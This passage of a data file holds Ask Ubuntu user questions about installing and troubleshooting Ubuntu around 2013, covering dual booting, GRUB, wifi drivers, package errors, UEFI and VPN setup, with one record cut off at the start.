'd select for the boot loader and why , and what selections wo n't work with regards to the boot loader instillation . i think i understand what grub is , but i have no idea on how to use it , or play around with it . i seem to be able to get back into os from my usb , however i believe it 's just showing me a preview/trial of ubuntu ( ie , ca n't access any of the system ntfs drives ) . note , if i try to install from the usb again , it will recognize that a version of ubuntu 13.10 exists on the system . apologies in advance , have used windows all my life , do n't really know to much about linux at all . did have a brief skim over some similar questions , did n't find anything too useful . - where to install bootloader when installing ubuntu as secondary os ? - ubuntu 12.10 dual boot with windows 8 on two hdds - dual-boot windows 7 and ubuntu on two ssds with uefi edit : found solution turns out , after i attempted to re-installing once more , that what was required was to create the root partition ( ~295gb ) as a primary partition instead of the default selected logical . it would n't recognize a logically formatted root partition . all working now , i 'm typing this from ubuntu as we speak . ( yipeee ! ) edit : clarification i still left the boot loader instillation specified to '/stb ' , and now i can use the bios to boot from the ssd or the hdd interchangeably . very handy . i still require an explanation as to why : using a logical partition would not be recognised the system 's bios ( i have an asus h-87 pro mobo ) . what would be different if i changed my boot loader instillation instead to '/sta ' ? would i no longer directly boot into windows , and instead use the grub interface every time ? is there a preferred place to install the boot loader instillation ? clarifying that specifying volumes such as '/sta1 ' or '/stb5 ' would not allow you to load the os ?
369871	is it necessary to enable discard on logical volumes if lvm is configured with `` issue_discards '' ?	lvm has a option issue_discards . if this option is set , does it make sense using discard on filesystem level ( ext4 here ) for filesystems being created in a lvm logical volume ?
369872	how to give an “503 service unavailable” error while apache is being upgraded by apt-get	i have an ubuntu 12.04.3 lts server ( precise ) . whenever apache2.2 is being updated by an apt-get upgrade command , the http server is shut down , so the clients can not connect at all during anything from a few seconds to a few minutes depending on the length of the upgrade . how can i configure my system to return a nice “503 service unavailable” error message instead ?
369876	problem adding folder from my computer in ubuntu one	in ubuntu one on my computer i 'm trying to `` add a folder from this computer '' so that in gets backed up into the ubuntu cloud for safe keeping . however , it just will not add the folder . as a test i also created a `` test '' folder in the home folder and tried adding that and that did n't work either . what am i doing wrong ? the folder i 'm trying to add ( music ) is in my home folder . for the time being i 've copied that folder into the `` ubuntu one '' folder so that it is being backed up and that works . but does that mean because ubuntu one always syncs that folder that it will download files to any computer/device to where i have ubuntu one installed ( work computer , app on tablet , add on phone ) . i do n't want them to appear on every device . my computer ( lenovo t430 ) is running 12.04 . thanks nigel
369877	problem with youtube to mp3 program	i find in web this adress https : //apps.ubuntu.com/cat/applications/saucy/youtube-to-mp3/ and there show when program is free , but in ubuntu software center i have to buy it . why ?
369878	telnet : name or service not known	when i accessed a remote host using telnet i got an error like this : root @ nani-inspiron-3520 : /home/nani # telnet amsys @ 192.168.0.4 telnet : could not resolve amsys @ 192.168.0.4/telnet : name or service not known root @ nani-inspiron-3520 : /home/nani # what 's the problem ?
369880	enable all touchpad functions	when i had been using windows 8 my touchpad had multiple gestures : 2 fingers direction top-bottom = vertical revers scrolling ( if i scrolled top than page have scrolled bottom ) ; 2 finger direction left-right = horizontal revers scrolling zoom in and zoom out like smartphones with 2 fingers 2 finger rotation = rotate image in image viewer ( + 90 deg or -90 deg ) place a finger in the left edge and drag it to right = change windows application , in ubuntu i want to change the active program to left like ctrl+shift+tab place a finger in the right edge and drag it to left = open right menu and select the option moving finger on direction top-bottom , in ubuntu i want to change the active program to right like alt+tab i succeed enable 2 finger vertical scrolling of system setings , but i want that it do not work in revers sense . do it exist a method to enable the rest of gestures and revers the vertical scrolling ? edit : it 's a synaptics touchpad .
369881	sound works but can not change settings or volume	volume is always on max . the volume indicator is showing three dashes and does not show anything when i click on it . clicking the `` sound '' button in settings causes it to recursively reopen settings . pulseaudio -- start does n't help . edit : this has only started happening after the upgrade to 13.10 edit 2 : this is in unity , yes . edit 3 : killall unity-panel-service works and does reload the panels , but previous problems persist . edit 4 : alsamixer seems absolutely fine .
369886	can i install ubuntu from external hard disk drive ?	i am new to ubuntu . i want to install it but i do n't have a optical disk or a usb memory . i have downloaded the ubuntu from ubuntu site and it is in my external hdd . can i use my external hdd to install ubuntu in my computer ( internal hdd ) .
369887	13.10 qtcreateor 271 wont work	just installed ubuntu 13.10 x86 with all updates . i then installed qt4 libraries and qt creator 271 : sudo apt-get install build-essentials sudo apt-get install libqt4-dev sudi apt-get install qtcreator both installed successfully , and i can launch qt creator , but then i get a black window when i switch to `` examples '' or `` development '' : http : //i.imgur.com/koi6s9s.png the windows can not be closed . i am guessing because qtcreator somehow can not find the qt version i installed . this is the settings page : http : //i.imgur.com/ogakh7s.png what to do ?
369891	change permission of raw /dev/sdb by uuid	i am using `` apache traffic server '' which may and it is better to use raw device like /dev/sdb without mounting it as a directory . so i should change the permission of /dev/sdb from root to user `` trafficserver '' to allow it formatting whole device as it likes . the problem starts after each reboot because /dev/sdb changes randomize so i should use uuid . but i can not change the permission of /dev/disk/by-uuid/48c2fac6-06eb-42c7-8b8a-3b83b781f28c . is there a way to permanently change permission of disk drive by uuid ?
369892	ubuntu 12.04 say 's router is disconnected even when it is connected	router : tp-link ( td-w8951nd ) the router was connected 2-3 times but the internet did n't worked and for the most of the times its said disconnected
369893	ubuntu wo n't start - blank screen with flashing white cursor	my laptop is dual-booted with windows 8 on one partition and ubuntu 12.04.3 on the other . i 've searched around for my issue already , but nothing i 've found so far has solved the problem . since last week , when i try to boot ubuntu from grub , i am taken to a purple screen ( as usual ) , but then to a black screen with a blinking white _ cursor . i 've tried just leaving it for a while , but nothing else happens . when i hold shift and edit the grub entry to change 'quiet slash ' to 'text ' , the back screen instead asks for my login and password . when i put them in , it tells me the date of my last logon , and then waits for further commands . being very very new to ubuntu , i have no idea at all what to try out at this point . i tried to launch failsafex , but while that was beginning , it said `` unable to run server /usr/bin/x '' no such file or directory '' , then shortly after returned to the recovery mode menu . pressing ctrl+alt+delete goes through an ubuntu loading screen , then the laptop restarts . any suggestions will be very much appreciated , and i apologise if this is a common issue that has been answered a million times before .
369895	13.10 networking restart - wifi icon	i 'm wondering how can i bring back the wifi taskbar icon after the following command is executed : service networking restart normally , that icon would be present to help us switching the available wifi networks quickly . however , if for any reasons one will restart the networking service - the icon will dissappear and wo n't come back . what app should i start to get it back ? thanks , jane
369896	installation problem - computer restarts	i am trying to install ubuntu 13.10 64 bit ( my ram is 3gb ) along side of windows . i have created a bootable usb and while installing i choose install ubuntu along side of windows , after clicking continue , the system automatically restarts and starts again from the scratch appreciate if someone could help . me . regards dendline joe gtalk : dendline @ gmail.com
369898	cant boot with graphics in uefi	i really searched for information to this problem but none of the guides or threads on forums have helped , either i cant search or this havent come up . no nomodeset , forcevesa , turning brightness up or anything have worked ... . i bought the laptop with ubuntu 13.04 preinstalled , bumblebeedrivers were on it but primusrun broke on the ubuntu 13.10 update . decided to reinstall ubuntu and install windows at the same time , so now i got windows up and running from uefi and have installed ubuntu 13.10 , grub works for windows and everything seems like normal . but when i try to boot ubuntu i cant manage to boot into anything else than failsafe rootterminal . screen just go black or i have a blank terminal flashing i upper left corner ... . dont know anything about x configuration or what to do . if anyone has an idea please let me know . laptop : clevo w230st intel i7 haswell intel hd4000 ( ? ) nvidia gtx765m
369900	windows 8.1 overwrites uefi boot settings	i installed ubuntu and windows 8.1 on an asrock a350m1 board without bigger problems . both installations were done in uefi mode . in uefi system settings i set `` ubuntu '' as primary boot target which opens the grub2 menu . this gives me the option to start ubuntu or windows 8.1 from this menu and works great . only problem is : as soon as i boot windows , the systems uefi boot options get overwritten and the `` windows boot menu '' which actually is n't a menu , is put on first place of the boot queue and directly boots windows . looks like this is forced from windows and i guess there 's no way to change this really but thought asking here could n't be of any fault - maybe someone knows a solution or at least an ugly work around so i do n't have to enter uefi settings each time i want to boot ubuntu after having booted windows before .
369901	unity icons problem	ever since i upgraded to 13.10 the icons in the unity panel appears in gnome 's default theme instead of unity . here 's a screenshot : http : //i.imgur.com/9cu15wk.png both the unity tweak tool and the gnome tweak tools show that the selected icon theme is ubuntu-mono-dark . executing setsid unity fixes the icons for the current session , but after logging in again the icons go back to the gnome default theme .
369903	python programming	i am learning python programming from full circle magazine . can anybody correct this program as it is not working . # ! /usr/bin/env python strng = 'the time has come' pos = strng.find ( 'time ' )
369906	wifi driver is not installing and wifi is not working	i have made dual booting with windows 7 and ubuntu 12.04 lts . i have hp pavilion g6 2102tx laptop . internet through lan wire is working fine but wifi is not turning on and is not connecting to any network . i have tried some of solutions written but they are in vain . someone please help me as i my college i have to work with ubuntu and there only wifi are available .
369910	installed mysql but still says command not found	i downloaded mysql 's rpm bundle from the site , converted it to a .deb file using alien and installed it by saying sudo dpkg -i mysql-server_5.6.14-2_amd64.deb . however , when i say mysql in the command line , it gives an error that it is not installed . what do i do ? i am on ubuntu gnome 13.10 64-bit
369915	warnings while launching gedit from the ubuntu terminal	i am facing these warnings while launching gedit from my terminal . eventually gedit starts , but with these lines of warning every time when i launch gedit : ( gedit:3830 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:138:20 : not using units is deprecated . assuming 'px ' . ( gedit:3830 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:138:24 : not using units is deprecated . assuming 'px ' . ( gedit:3830 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:138:28 : not using units is deprecated . assuming 'px ' . ( gedit:3830 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:138:32 : not using units is deprecated . assuming 'px ' . ( gedit:3830 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:2237:26 : 'none ' is not a valid color name ( gedit:3830 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:2264:20 : not using units is deprecated . assuming 'px ' . ( gedit:3830 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:2264:24 : not using units is deprecated . assuming 'px ' . ( gedit:3830 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:2264:28 : not using units is deprecated . assuming 'px ' . ( gedit:3830 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:2264:32 : not using units is deprecated . assuming 'px ' . ( gedit:3830 ) : gtk-warning ** : theme parsing error : sidebar.css:22:20 : not using units is deprecated . assuming 'px ' . ( gedit:3830 ) : gtk-warning ** : theme parsing error : sidebar.css:40:18 : not using units is deprecated . assuming 'px ' . ( gedit:3830 ) : gtk-warning ** : theme parsing error : sidebar.css:40:20 : not using units is deprecated . assuming 'px ' . ** ( gedit:3830 ) : warning ** : could not load gedit repository : typelib file for namespace 'gtksource ' , version '3.0 ' not found ( gedit:3830 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files ( gedit:3830 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files
369917	can i fix all my broken packages with live cd ?	how i can reinstall all my broken packages system with livecd for ubuntu 12.04 ?
369919	untrusted packages - sudo access denied	all my installations require installation of untrusted packages , and by clicking ok on it i get nowhere . than i try to do something through terminal according to posts on this site and than i get sudo access denied and it says that it will be reported ... i 'm doomed
369924	switchable graphics : embeded graphics card problems	i have a dell inspirion 17r 5721 it has a amd graphics card and a intel . i installed the drivers that amd develops and i ran into the following problems . every time it 's me that has to change the card from intel to amd and vice versa . when i 'm using intel ... graphics do n't actually work . the error i 'm getting from a game when i run it is this : error : ld.so : object '/home/deus/programs/phoenix_firestorm-release_i686_4.4.2.34167/lib/libcrypto.so.1.0.0 ' from ld_preload can not be preloaded : ignored . error : ld.so : object '/home/deus/programs/phoenix_firestorm-release_i686_4.4.2.34167/lib/libssl.so.1.0.0 ' from ld_preload can not be preloaded : ignored . error : ld.so : object '/home/deus/programs/phoenix_firestorm-release_i686_4.4.2.34167/lib/libcrypto.so.1.0.0 ' from ld_preload can not be preloaded : ignored . error : ld.so : object '/home/deus/programs/phoenix_firestorm-release_i686_4.4.2.34167/lib/libssl.so.1.0.0 ' from ld_preload can not be preloaded : ignored . what i understand from this is that some libraries could n't be loaded ? but why does it work when i 'm using amd 's card and not when i use intels ? before amd put out drivers for my graphics card in linux , i used intel graphics card and it worked . since discrete graphics are not well supported ( talking about crazy fan speed and heat problems ) i want to use only intel 's graphic card and keep discrete deactivated . any ideas on how to make intel run my game again and keep discrete card from running ( freaking fan drivers me crazy ) when i use linux ?
369928	how can i do to change my shell from tcsh to bash ?	i do n't know how can i do that ... i use ubuntu 12.04 .
369931	apt locked by corrupt library package in ubuntu 13.10	i have tried a little hacky way to solve my question by downloading some debian library file directly from lunchpad . and after that my apt is locked and i ca n't move forward . i have tried , sudo apt-get update -- fix-missing and sudo dpkg -- configure -a and sudo apt-get install -f finally everything shows this error , unpacking replacement libusb-0.1-4 : i386 ... dpkg : error processing /var/cache/apt/archives/libusb-0.1-4_2 % 3a0.1.12-23.2ubuntu1_i386.deb ( -- unpack ) : trying to overwrite shared '/usr/share/doc/libusb-0.1-4/changelog.debian.gz ' , which is different from other instances of package libusb-0.1-4 : i386 errors were encountered while processing : /var/cache/apt/archives/libusb-0.1-4_2 % 3a0.1.12-23.2ubuntu1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i am also tried , sudo fuser -vki /var/lib/dpkg/lock sudo dpkg -- configure -a sudo rm /var/lib/apt/lists/lock sudo rm /var/cache/apt/archives/lock and update . how can i solve this ? every time it 's trying to install some libraries which is up to 25mb but fails with the libusb package .
369933	auto-change in brightness after reboot ubuntu 13.10	i have noticed that after i set the brightness ( high to low ) in ubuntu 13.10 and then after when i do my work . after rebooting up the pc , the brightness again turns to high . i 'm literally tired of this . : ' ( : (
369936	recommendations for taskbar	i recently updated to ubuntu 13.10 and now tint2 stopped working . better yet : it works , i just can not see it as the all bar is now transparent . since tint2 is no longer maintained i doubt it will be updated hence i 'm now looking into alternative is there are any . in short : looking for a simple taskbar that sits at the bottom of the screen and that lists applications per window ( no groupping ! ) . do n't need fancy animations or widgets/features . any ideas ?
369939	full screen in virtualbox	i have a macbok pro 13 '' and i 'm using virtualbox to run ubuntu 12.04 . my problem is i ca n't resize ubuntu for occupy the 13 '' of my screen when i use full-screen mode . ubuntu only allows me to use two screen size options , 1024x768 or 800x600 . the 800x600 option is too small , and cuts the screen in a smaller size with black edges.with the 1024x768 option , i only have black edges on the left and on the right . is there any option for extending the image at the whole screen ?
369942	how to use my laptop as a web server using ubuntu 12.10	i am using ubuntu 12.10 and i want to use as a webserver for my domain . also i want to install wordpress on the domain . i want to how can i do that . and help , please
369944	harddrive used up in gparted , after fresh install of 13.10	harddrive used up in gparted , after fresh install of 13.10 i have just installed ubuntu 13.10 on an old hp computer which ran on xp . on installing ubuntu first through memory pen and later reinstalled by disk , by computer is really slow . you can se the process of a window closing in 10 secounds before its finished . i did top in terminal and saw that compiz was taking all resources and i tried to mend that , but now think that the graphic card driver is a dead end . i saw later that there is something wrong in the partition and disk use . in gparted the whole disk is used , but not in real life ( se picture ) i am no able to resize the partitions and have no clue what to do . can anybody point me in the right direction . the image below shows the disk situation
369946	displayport 1.2 mst/daisy chain - dual monitor setup - intel graphics	i am running ubuntu 13.10 on a desktop system and i have 2 monitors that i am trying to connect via displayport 's 1.2 multi-streaming support . the system is equiped with an intel core i7-4770k processor and i 'm using the displayport ( 1.2 ) output of the intel hd graphics 4600 to connect the computor to a dell u2413 monitor . the second monitor ( dell u2412 ) is connected via a displayport 1.1 cable to the dell u2413 monitor . ubuntu detects the u2413 monitor fine , but it does n't detect the u2412 monitor . ( the u2412 monitor is only recognised when i connect it directly to computor . ) the daisy chain setup works fine under windows 7 though ... any ideas on how to get it working under ubuntu ?
369947	how to add an audio file ( aac or mp3 ) to a mp4 video file ?	i have an mp4 video file created from images and would like to add mp3 sound to it . i am not familiar with video editing at all , but read somewhwere that aac sound is preferred , so i got sound in aac form as well . the preferred form of the result is also mp4 or flv . my operating system is ubuntu ( saucy salamander ) . i have googled a lot for avconv and mencoder trying to transform the found examples to my case without any success . will you be kind enough any of you , experts , to drop me a command line example how can i do it ?
369949	openvpn - can not browse ipv4 websites	i have set up an openvpn tunnel on my vps ( openvz - ubuntu 12.04 ) . the problem is when i 'm connected to the vpn , i can only browse websites which support ipv6 like google . ipv4 sites are n't loading ( no error , just waiting indefinitely ) . http : //whatismyv6.com/ reports me that i 've an ipv6 address , so i guess this is the problem . server configuration : dev tun server 10.8.0.0 255.255.255.0 ifconfig-pool-persist ipp.txt ca /etc/openvpn/easy-rsa/keys/ca.crt cert /etc/openvpn/easy-rsa/keys/server.crt key /etc/openvpn/easy-rsa/keys/server.key dh /etc/openvpn/easy-rsa/keys/dh1024.pem push `` route 10.8.0.0 255.255.255.0 '' push `` dhcp-option dns 8.8.8.8 '' push `` dhcp-option dns 8.8.4.4 '' push `` redirect-gateway def1 '' comp-lzo persist-tun persist-key status openvpn-status.log log /var/log/openvpn.log verb 3 client configuration : client remote xx.xx.xx.xx 1194 dev tun comp-lzo ca ca.crt cert client1.crt key client1.key redirect-gateway def1 verb 3 i have configured nat with this command : iptables -t nat -a postrouting -s 10.8.0.0/24 -j snat -- to xx.xx.xx.xx can someone explain me how i can make it works ( forcing ipv4 ? ) i had the same problem with another vps and i also tried on another client ( all windows 7 ) .
369951	usb flash drive file system is shown as unknown after successful formatting in gparted	i have a kingston 8 gb pen drive which was not accessible from windows . windows said that the pen drive needs to be formatted but windows was n't able to format it . i deleted the partition or whatever it was from gparted and created a new partition table . i made a primary partition of size 8 gb and formatted it with fat32 . it was successfully formatted but after refreshing there was a red reclamation mark and it said unknown file system . i tried to format it in ntfs and ext4 but it showed the same unknown file system . and in windows disk manager and minitool partitioning wizard it was unformatted and windows and minitool were not able to format it . please give a solution if possible but please explain clearly as i am new to ubuntu .
369953	mapping keyboard inputs to other keys	on windows i use the following autohotkey script to remap my keyboard : ^del : : sendinput { home } return ^ins : : sendinput { end } return ^home : : sendinput { ins } return del : :pgup ins : :pgdn home : :del how would i `` insert '' this key-mapping script in to ubuntu and is the syntax similar ?
369955	ubuntu equivilant to windows explorer	what i want to do is edit a file : /usr/share/vlc/http/.hosts . in windows i locate the file click open with notepad . in ubuntu i go to files/home and i ca n't see any users . can someone point me in the right direction please .
369959	setting the icon_theme_path in python script	i 've made a python script to add a new indicator in the systray on ubuntu unity . when i set a specific folder for the icon , the icon appears in the systray . exemple : self.ind.set_icon_theme_path ( `` /home/myuser/directory/ '' ) self.ind.set_icon ( `` the_icon '' ) but , how i can change the icon_theme_path line to use the current folder where is the script.py ? like this : self.ind.set_icon_theme_path ( `` /home/ $ user/directory/ '' ) self.ind.set_icon ( `` the_icon '' ) thanks for your answers !
369966	ca n't ( re ) install lazarus	i had lazarus installed ( from website , not usc ) , while upgrading to 13.10 and after that , it posted some error message ( which i ca n't remember ) at every start . i decided it should n't suffer , so i started reinstalling it , but it did n't work . then i thought i 'll start all over , and deleted and purged everything . but it still would not install . i found a similar , very similar question to mine here : cant correctly install lazarus i tried everything said there : sudo dpkg -l | grep `` ^rc '' returned some packages : since sudo apt-get -f brought up the apt-get help message , and sudo apt-get -f install did nothing , i went ahead and manually purged every broken package , which seemed to bring me forward , since it removed the entries in sudo dpkg -l | grep `` ^rc '' . when i was done i tried it again , since it did n't work i rebooted , no change . this is the error message i get on the attempt to install the first package ( fpc-2.6.2 ) : root @ someone-pc : ~ # dpkg -i /home/someone/desktop/fpc_2.6.2-0_amd64\ \ ( 3\ ) .deb ( reading database ... 242209 files and directories currently installed . ) unpacking fpc ( from ... /fpc_2.6.2-0_amd64 ( 3 ) .deb ) ... dpkg : error processing /home/someone/desktop/fpc_2.6.2-0_amd64 ( 3 ) .deb ( -- install ) : trying to overwrite '/usr/lib/fpc/2.6.2/msg/errores.msg ' , which is also in package fp-compiler-2.6.2 2.6.2-5 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /home/someone/desktop/fpc_2.6.2-0_amd64 ( 3 ) .deb so , how can i fix this ? and install lazarus ?
369967	how do i set the default file association in ubuntu 13.10 nautilus/files with unity to something that is not listed in the open with tab ?	there used to be an option for adding unlisted commands , but it seems to be gone . does anyone know how to do that now ?
369969	macbook air freezes while running ubuntu 13.10	ok folks i 'm trying to setup my macbook air to run ubuntu 13.10 ( note : i normally using kubuntu but currently running ubuntu ) . i have run all of the updates for the system as of this posting . this happens regardless of the application i have open ( firefox , terminal , software updater ) . the system will freeze , become unresponsive and then kick me back to the login screen . i do n't see a crash notification or anything to send as troubleshooting so i do n't know where to start
369973	ca n't play dvd '' s	i can play audio cd 's but not encrypted dvd 's , not even with vlc player . i have tried everything that has been suggested but i still ca n't get the medibuntu libdvdcss repository . can someone help ?
369974	video for ubuntu 13.04	i ca n't get ubuntu 13 to load right i think it is do to my nvida card looking to just get an ati card so i can just load ubuntu with out all the hub-bub mobo is asus m5-a99x evo it is an asus nvida vc but ca n't find out what kind , i lost info and no usable info on the card it self other than most of the sites i have gone to are out of date this post 11/02/13
369976	blinking cursor when i try to install ubuntu 13.10 from usb	today i tried to install ubuntu 13.10 from usb and when i restart and boot into usb a blinking cursor screen appears . i use the same usb to install windows 8 on my laptop and it works fine . i tried two usb 's ( 1 kingston 8gb and another sony 8gb ) and different software 's like unetbootin , usb creator etc but no luck . my laptop is a hp pro book 4420 's . until now i used wubi and installed ubuntu 64bit . due to the 30gb limit i want to install ubuntu on my unused 99gb drive . is there any way to increase the 30gb limit before or after installing ubuntu ? ?
369978	unmet dependencies -linux-headers-3.5.0-41	when i go in the ubuntu software center , i get a message saying `` items can not be installed or removed until the package catalog is repaired . '' i try to repair it from there but nothing happens . then , i go to the command line and write sudo apt-get -- fix-missing install . i get a message in return saying , `` the following packages have unmet dependencies : linux-headers-3.5.0-41-generic : depends : linux-headers-3.5.0-41 but it is not installed . '' then is says to try it using -f. i do , but nothing happens . can you please tell me how to get linux-headers-3.5.0-41 from the command line ? thank you !
369980	i ca n't upgrade from 13.04 to 13.10	i want to upgrade from 13.04 to 13.10 but i just ca n't . what i do is from dash - > software update - > then it shows 13.10 is available upgrade - > authentication but after that there is no progress . what is wrong . ?
369984	how to automatically mount hibernated ntfs to read-only ?	is there any way to set up ubuntu this way : if i ca n't mount the filesystem in rw mode , then mount it in ro mode in the same directory . in result i should not come across the notification that the system ca n't mount the filesystem ( skip or manual fix notification ) . so when i start the system i should have my ntfs partitions mounted either in rw or ro mode depends if the windows is hibernated . fstab entry : # /dev/sda7 uuid=d0b43178b43161e0 /media/dane ntfs defaults , errors=remount-ro 0 1 '' mount -a '' result : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda7 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . i have ubuntu 13.10 and win8 . i use uefi secure boot .
369987	no sound while `` listening '' to the radio	mplayer opens a link and it seems to be running smoothly . the only problem is that there is no sound to listen to . apart from this there are no problems with sound in system .
369990	`` can not find symbol '' error in java in ubuntu compiled using javac	i am getting the following error in spite of both `` hdbms_main '' and `` login '' being in the same package directory . this is a part of a project and this problem did n't appear on windows on a different computer . hdbms_main.java:6 : can not find symbol symbol : class login location : class dbms_gui.hdbms_main login start = new login ( ) ; ^ hdbms_main.java:6 : can not find symbol symbol : class login location : class dbms_gui.hdbms_main login start = new login ( ) ; ^
369991	software-center wo n't load on android	i 've installed ubuntu with gnome on my android tv box using the 'deploy linux ' app . i apt-get 'd the software center , but it wo n't open . when i try to open it using the terminal , i get the following exception : unable to connect to socket /var/run/dbus/system_bus_socket : no such file or directory . when i navigate to /var/run , there is no directory named ./dbus . i 'm quite inexperienced in the linux environment , so any suggestions would be helpful .
369993	installation stopped	i tried to install ubuntu 13.10 on my acer aspire 5020 but installation stopped at : bcmwl-kernel-source confiuration ( process:23325 ) : glib critical ** : g slice set config : assertion 'sys page size == 0 ' failed what can i do ?
369994	installation issues 12.04	i have now got a working copy of 12.04 , 32bit . i used a windows disc to format my hdd then tried to install ubuntu . i select language , then install . it starts doing its thing then i get a blank screen with the cursor flashing in top left hand corner . any ideas ? thanks
369995	lubuntu 13.10 update-manager never shows notifications	i have peppermint 3 installed on several family laptops at home . on all of those machines , the lxde desktop has a shield icon in the notifications area that displays an alert symbol if there are updates waiting to be installed . i recently updated a work vm of mine to lubuntu 13.10 ( had previously been running ubuntu gnome 13.04 ) , and no such icon is apparent , and i have yet to see a notification , even when there are available updates . i 've looked at some settings in `` default applications for lxsession '' , update-manager and in dconf-editor , and everything seems to point to update-manager being set for this . can anybody verify that lubuntu 13.10 has update notification normally , and how i go about diagnosing and fixing this ? update : i just found this other question that may be at the root of my issue .
369996	iwlwifi on lenovo z570 disabled by hardware switch	it was working fine with windows 7 . the hardware switch is not disabled . i 've toggled it back and forth dozens of times . the wifi light never turns on and it always lists as hardware disabled . i have the latest updates installed . i 've been searching for solutions , but none of them seem to work for me . i 've tried removing acer-wmi . i 've tried setting 11n_disable=1 . i 've tried resetting the bios . i 've tried using rfkill to unblock ( only removes soft block ) . i 've rebooted dozens of times . the wifi light turns off as soon as grub loads . edit : i have a usb edimax wireless nic . it shows hardware disabled as well ( although rfkill lists as unblocked ) . if i unload iwlwifi the usb nic works fine . uname -a `linux xxx-ideapad-z570 3.2.0-55-generic # 85-ubuntu smp wed oct 2 12:29:27 utc 2013 x86_64 x86_64 x86_64 gnu/linu`x rfkill list 19 : phy18 : wireless lan soft blocked : no hard blocked : yes dmesg [ 43463.022996 ] intel ( r ) wireless wifi link agn driver for linux , in-tree : [ 43463.023002 ] copyright ( c ) 2003-2011 intel corporation [ 43463.023107 ] iwlwifi 0000:03:00.0 : pci int a - > gsi 17 ( level , low ) - > irq 17 [ 43463.023190 ] iwlwifi 0000:03:00.0 : setting latency timer to 64 [ 43463.023253 ] iwlwifi 0000:03:00.0 : pci_resource_len = 0x00002000 [ 43463.023257 ] iwlwifi 0000:03:00.0 : pci_resource_base = ffffc900057c8000 [ 43463.023261 ] iwlwifi 0000:03:00.0 : hw revision id = 0x0 [ 43463.023797 ] iwlwifi 0000:03:00.0 : irq 43 for msi/msi-x [ 43463.024013 ] iwlwifi 0000:03:00.0 : detected intel ( r ) centrino ( r ) wireless-n 1000 bgn , rev=0x6c [ 43463.024250 ] iwlwifi 0000:03:00.0 : l1 enabled ; disabling l0s [ 43463.045496 ] iwlwifi 0000:03:00.0 : device eeprom ver=0x15d , calib=0x6 [ 43463.045501 ] iwlwifi 0000:03:00.0 : device sku : 0x50 [ 43463.045504 ] iwlwifi 0000:03:00.0 : valid tx ant : 0x1 , valid rx ant : 0x3 [ 43463.045542 ] iwlwifi 0000:03:00.0 : tunable channels : 13 802.11bg , 0 802.11a channels [ 43463.045744 ] iwlwifi 0000:03:00.0 : rf_kill bit toggled to disable radio . [ 43463.047652 ] iwlwifi 0000:03:00.0 : loaded firmware version 39.31.5.1 build 35138 [ 43463.047823 ] registered led device : phy18-led [ 43463.047895 ] cfg80211 : ignoring regulatory request set by core since the driver uses its own custom regulatory domain [ 43463.048037 ] ieee80211 phy18 : selected rate control algorithm 'iwl-agn-rs' [ 43463.055533 ] addrconf ( netdev_up ) : wlan0 : link is not ready nm-tool state : connected ( global ) - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : iwlwifi state : unavailable default : no hw address : 74 : e5:0b:4a:9f : c2 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points lshw -c network *-network disabled description : wireless interface product : centrino wireless-n 1000 [ condor peak ] vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 00 serial : 74 : e5:0b:4a:9f : c2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-55-generic firmware=39.31.5.1 build 35138 latency=0 link=no multicast=yes wireless=ieee 802.11bg resources : irq:43 memory : f1500000-f1501fff lspci 03:00.0 network controller : intel corporation centrino wireless-n 1000 [ condor peak ]
369998	is there any way to add windows maximize animation using compiz	i am using ubuntu 13.10 unity . is there any way to modify maximize ( not unminimize ) using compiz ? i mean windows animation when an application goes to full screen state .
369999	open 2 instances of the same pogram	i have a ssh server running in my home computer , with x11forwarding enabled . i would like to connect to my computer from another computer and run some graphical programs . the problem is , that if a particular program is already running in my home computer , then it wo n't run again in my remote computer.. all it does is gain focus in the home computer ... i believe this problem can be solved if i 'll find a way to open 2 instances of the same program . i know that if i connect to another user , or run the program from another user in my local computer than i will be able to run the same program twice , once in each user.. so i believe a solution would be to simulate a run of the program as another user ... problem is , i have only 1 user account , and i do want to run the programs - remotely , and locally from that particular user ( which has access to my files and settings ) . what is the simplest way to accomplish it ?
370004	advice on triple/quadruple-booting ?	i am currently running windows 7 home premium x64 on my laptop . i would like to install more than one linux distro , in addition to windows 7 . how do i go about this , what do i need to be careful and aware of , is it possible ? the specific distros i might eventually install : definitely : ubuntu ( is it a good idea to install the linux-secure-remix version ? ) almost definitely : opensuse probably : zorin possibly : arch possibly : fedora possibly : freebsd computer details : successfully used wubi for ubuntu in the past recently reinstalled windows using the recovery partition windows 7 home premium x64 model : asus k53u series amd brazos dual core e450 1.65 ghz 750gb hard drive , currently partitioned into c : ( 300gb total , 246 gb free ) , d : ( 373gb - total , 167 gb free ) , and recovery ( the rest of the space , i think ) 4gb ram can i be sure that grub will work , if wubi has worked ? in short , how do i go about triple- or quadruple-booting windows 7 , ubuntu and other distros ? what do i need to be aware of ? how do i set up the partition structure ? thank you in advance
370007	vmware installed but cant open	i installed the .bundle file via sudo sh vmware-workstation-full-9.0.2-1031769.x86_64.bundle how do i open the file once i 've installed it ?
